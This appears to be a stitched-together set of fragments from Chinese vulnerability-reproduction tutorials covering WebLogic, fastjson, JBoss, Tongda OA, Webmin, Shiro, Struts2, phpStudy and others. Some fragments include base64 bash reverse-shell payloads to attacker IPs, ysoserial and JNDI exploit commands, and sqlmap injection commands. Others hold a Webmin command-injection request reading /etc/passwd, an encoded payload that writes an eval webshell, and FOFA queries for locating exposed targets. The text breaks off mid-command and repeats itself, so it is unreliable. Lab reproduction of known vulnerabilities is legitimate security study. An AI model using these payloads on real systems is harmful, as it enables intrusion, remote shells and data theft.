一、漏洞描述 用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8 SQL注入漏洞。 ! https://img-blog.csdnimg.cn/fe260ff4d6d14abeb0e576e4bbf3c385.png 二、网络空间搜索引擎搜索 fofa查询语法 app="用友-GRP-U8" 三、漏洞利用 POC:拼接/u8qx/slbmbygr.jsp? gsdm=1 访问 漏洞存在 漏洞不存在 使用SQLmap进行注入利用 sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp? gsdm=1*" 查询当前用户权限 sqlmap -u "http://xxxx:xxxx/u8qx/slbmbygr.jsp?gsdm=1*" --batch --is-dba
Hello,各位小伙伴大家好~ 这里是一名白帽的成长史~ 最近在攻防演习中用到ActiveMQ的漏洞进行getshell 今天就来复现一下它的一系列漏洞吧~ Part.1 环境准备 环境说明 Apache 该中间件存在包括任意文件上传、反序列化等一系列历史漏洞。 环境搭建 Vulhub是一个基于docker和docker-compose的漏洞环境集合,配合docker进行使用。 首先根据官网说明,安装好vulhub: https://vulhub.org/ 通过vulhub进行漏洞环境搭建: 查看容器端口映射关系,搭建成功: Web服务端口为8161,尝试访问主页: http ://192.168.3.129:8161 Part.2 漏洞复现 默认口令&未授权访问 ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面 当管理员访问Web管理页面并读取消息时,则会触发该漏洞。
漏洞简介事项描述漏洞概述fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。 漏洞编号CVE-2017-18349漏洞搭建这里使用vulhub的fastjson/1.2.24-rce进行复现。 访问http://192.168.146.167:37150/漏洞复现使用工具进行检测发现dnslog有数据,说明存在漏洞。 反弹的的ip和端口是192.168.146.161和10000 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjE0Ni4xNjEvMTAwMDAgMD4mMQ
通达OA命令执行漏洞复现 目录 漏洞描述 漏洞等级 漏洞影响版本 修复建议 漏洞复现 ▶漏洞描述 通达OA是北京通达信科科技有限公司出品的 "Office Anywhere 通达网络智能办公系统"。 com/oa/security/2020_A1.7.25.exe 2013版 http://cdndown.tongda2000.com/oa/security/2020_A1.6.20.exe ▶漏洞复现 安装好漏洞环境后,访问目标网站。默认账号:admin 密码为空 ◣脚本复现 首先用脚本复现,直接命令执行即可。 python3 tongda_rce.py 目标URL ◣手工复现 手工抓包验证,该漏洞存在于以下两个链接中,并且以下链接无需认证即可访问。 > ------WebKitFormBoundarypyfBh1YB4pV8McGB-- 上传成功后,我们看到服务器端返回的数据。
-d启动如下漏洞复现此漏洞复现需要下载ysoserial和exploit.py脚本,我们使用ysoserial开启JRMP服务java -cp ysoserial.jar ysoserial.exploit.JRMPListener 漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现输入此命令即可查看weblogic用户密码,密码随机,请自行docker ,但是此漏洞前提是需要知道后台管理员密码CVE-2020-14882(未授权+RCE)简介此次复现是两个漏洞组合导致远程命令执行,分别是CVE-2020-14882和CVE-2020-14883。 xml version="1.0" encoding="UTF-8" ? ,此工具需要使用JDK8版本使用java执行jar包DNS请求成功响应,说明漏洞存在反弹shell首先需要使用JNDIExploit-1.4-SNAPSHOT.jar启动ldap服务 java -jar
heartbleed漏洞复现 参考链接 1、先换源 换源可参考 2、配置环境,安装docker、dockers-compose sudo apt-get install docker sudo apt-get restart docker 进入openssl/heartbleed目录,执行以下命令,在后台创建服务 sudo docker-compose up -d 输入docker ps查看服务运行状态(发现漏洞存在于 443端口) 用kali作为攻击机扫描漏洞,发现存在heartbleed漏洞 nmap -sV -p --script ssl-heartbleed.nse 192.168.43.131 启动
然后和jboss4一样访问页面即可 这次上传的时候确实有流量了,但是上传的却不完整,所以也没有办法成功复现,我觉得应该是vulnhub的环境问题 JBoss Administration Console JBOSS反序列化漏洞合集 由于反序列化漏洞的攻击方式都是一样的,只是漏洞发生的文件和成因不同,所以就以JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)为例子过一遍流程 JBoss (github.com) java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC40Mi82OTY5IDA (github.com) java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC40Mi82OTY5IDA /jexboss.py -host http://192.168.200.43:8080/ 首先会先扫描是否存在漏洞,然后验证未授权漏洞 ? 未授权漏洞验证失败后验证反序列化漏洞 ?
xml version="1.0" encoding="UTF-8"?> <!DOCTYPE test[ <! xml version="1.0" encoding="UTF-<em>8</em>"?> <!DOCTYPE test[ <!
github.com/vulhub/vulhub/blob/master/weblogic/weak_password/README.md weblogic之SSRF Vul:Weblogic中存在一个SSRF漏洞 ,利用该漏洞可以发送任意HTTP请求,进而攻击内网中redis、fastcgi等脆弱组件 访问 http://192.168.42.128:7001/uddiexplorer/ ? nc -l -p 8888监听即可 weblogic之XMLDecoder反序列化漏洞(CVE-2017-10271) Vul:Weblogic的WLS Security组件对外提供webservice 服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。 访问 http://192.168.42.128:7001/wls-wsat/CoordinatorPortType11,存在下图则说明可能存在漏洞 ? 构造POST包发送数据反弹shell: ?
目录 一,Weblogic简介 二,Weblogic漏洞环境搭建 三,Weblogic弱口令 四,CVE-2014-4210 漏洞环境 漏洞危害 漏洞复现 进行内网存活探测 一,Weblogic简介 cmd=ls 查看cmd就可以看到文件路径 四,CVE-2014-4210 漏洞环境 FOFA搜app="Weblogic_interface_7001" 漏洞危害 Weblogic 漏洞复现 http://your-IP:7001/uddiexplorer/SearchPublicRegistries.jsp 进行内网存活探测 http://your-IP:7001/ %2Fv9IVx89bAzX0iOBAU8jF%2B9oH5KE9KBzM%2FT1Vr3DDwmNny2qYCfizO9jJ90fr3DUeXWwl%2BD24XiKfkDzlDly9LgEYxXl% 2FCIgZ91QcTA0UeSBLXCgigVLKhDNZGGBqMFrGNUsj0esNJr7pJsYEnIn%2BN5BtnUWEce1KERlGDiwvzRpyFvOKgQpEAiS%2BR781GSsAsJsCQz8OFge6lx0iSMNZ6TWjkQYKlnTkQvzOo
Nginx + php-fpm 的服务器,在使用如下配置的情况下,都可能存在远程代码执行漏洞: ? Tsudo apt install golang-go ?
今天一起来看看CVE-2017-10271的复现吧~ ? ? Part.1 漏洞说明 漏洞说明 1、漏洞描述 WebLogic WLS组件中存在CVE-2017-10271远程代码执行漏洞,可以构造请求对运行WebLogic中间件的主机进行攻击,近期发现此漏洞的利用方式为传播挖矿程序 2、部署漏洞环境 如果刚开机,需要先启动docker: ? Part.3 漏洞复现 漏洞检测 可以直接使用工具进行漏洞检测: ? 如果存在该页面,则可能存在漏洞。 ?
注:本文中使用的域名是不存在DNS域传送漏洞的,本文仅用作技术交流学习用途,严禁将该文内容用于违法行为。 而“域传送”漏洞则是由于dns配置不当,本来只有备份服务器能获得主服务器的数据,由于漏洞导致任意client都能通过“域传送”获得主服务器的数据(zone数据库信息)。 如果提示无法列出域,那就说明此域名不存在域传送漏洞。 原文地址:https://www.teamssix.com/year/191206-172901.html 参考文章: http://sunu11.com/2017/03/16/8/ https://www.jianshu.com /p/d2af08e6f8fb http://www.lijiejie.com/dns-zone-transfer-1/ https://www.alibabacloud.com/help/zh/faq-detail
Tomcat有一个管理后台,其用户名和密码在Tomcat安装目录下的conf omcat-users.xml文件中配置,不少管理员为了方便,经常采用弱口令。 Tomcat 支持在后台部署war包,可以直接将webshell部署到web目录下,如果tomcat后台管理用户存在弱口令,这很容易被利用上传webshell。
path=设置了任意文件读取楼栋号,通过此漏洞来读取SerializedSystemIni.dat 读取了以后右键将其保存为文件 [633ed7761b5f622fb8a456ae5ef65562.jpeg ] 接着读取config.xml,加密后的管理员密码标签为<node-manager-password-encrypted> [ba7733d4e8edae34e74b5662559df8b1.jpeg 为复制得到的时间戳,shell.jsp为上传文件的名字 [5cf3141bd85a7d0b60f57d021d958250.jpeg] /ws_utc/begin.do ws_utc/begin.do我这里复现地也是有问题 这个漏洞的复现过程和上面的差不多 接着抓包,改为POST方式提交,然后增加Content-Type:text/xml头 pauload: <soapenv:Envelope xmlns:soapenv= (CVE-2020-2551) 这个漏洞没有复现成功,所以就记录一下过程 版本:10.3.6.0.0,12.1.3.0.0,12.2.1.3.0,12.2.1.4.0 工具:https://pan.baidu.com
Shiro<1.2.4版本,其使用的密钥为固定密钥Shiro550kPH+bIxk5D2deZiIxcaaaA==,这就更容易导致RCE漏洞 漏洞复现 用vulhub复现 cd vulhub/shiro 漏洞检测 .do或者 .action 的网站后缀 漏洞复现 s2-001 使用Vuldb靶场进行复现 cd vulhub/struts2/s2-001 而后开启容器 docker-compose up 漏洞复现 cd vulhub/fastjson/1.2.24-rce docker-compose up -d 访问环境 在攻击机模拟json发送post请求 curl http://192.168.1.129 漏洞复现 准备反弹shell指令如下 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMTI5LzY2NjYgMD4mMQ==}|{base64 漏洞复现 Vulhub复现 cd vulhub/weblogic/CVE-2017-10271 docker-compose up -d 开启环境后访问http://192.168.1.129:7001
复现环境:Kali2017、Metasploit2 复现思路:利用NFS服务将本地主机的ssh公钥传输到目标主机上,再利用ssh连接到目标主机 1、首先利用nmap扫描一下目标主机,查看是否存在ssh、 4、这个漏洞防御也主要在于权限的问题,本着最小权限的思想,对于一些普通文件所属用户普通用户即可,对于敏感的目录要限制普通用户访问。
该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。 黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 0X1 环境搭建 环境:Ubuntu-14.04.4-desktop-amd64.iso 利用条件:Linux kernel >= 2.6.22 0X2 漏洞复现 adduser test/123456 在诸多安全攻防环境中,该漏洞被作为提权的漏洞可能性非常大。 0X3 漏洞成因 Linux写时拷贝技术(copy-on-write) 在Linux系统中,fork()会产生一个和父进程完全相同的子进程,但子进程在此后多会exec系统调用,出于效率考虑,Linux系统中引入了
Webmin RCE 漏洞复现 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 正式开始 我的环境: 靶机:https://192.168.214.136:10000 攻击机:192.168.214.129 一般通过docker默认安装完以后就可以了,不需要再去改配置直接就可以复现漏洞 这个漏洞是存在于用户更改密码处,由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞 看到这个页面,接下来随便输入用户名密码进行抓包 然后更改数据包为 POST /password_change.cgi x-www-form-urlencoded Content-Length: 60 user=admin&old=test | cat /etc/passwd&new1=123456&new2=123456 查看返回包,发现命令执行漏洞
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll :PHPStudy后门事件分析 0x02 环境准备 本次漏洞复现的演示靶场为phpStudy 2018中的php-5.2.17+Apache环境 phpStudy 2018 后门版:点击下载 提取码:nlnq 0x04 漏洞复现 1. 发现漏洞 BurpSuite是在做渗透测试时必不可少的抓包工具,因此利用BurpSuite的扩展插件在抓取数据包时进行自动分析检测,非常便捷。 BurpSuite-Extender-phpStudy-Backdoor-Scanner:点击下载 插件安装成功后,在每次抓包时就会自动的扫描分析漏洞是否存在,若存在漏洞,则会提示相应的告警信息。 ZnB1dHMoZm9wZW4oJ0M6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk7ID8+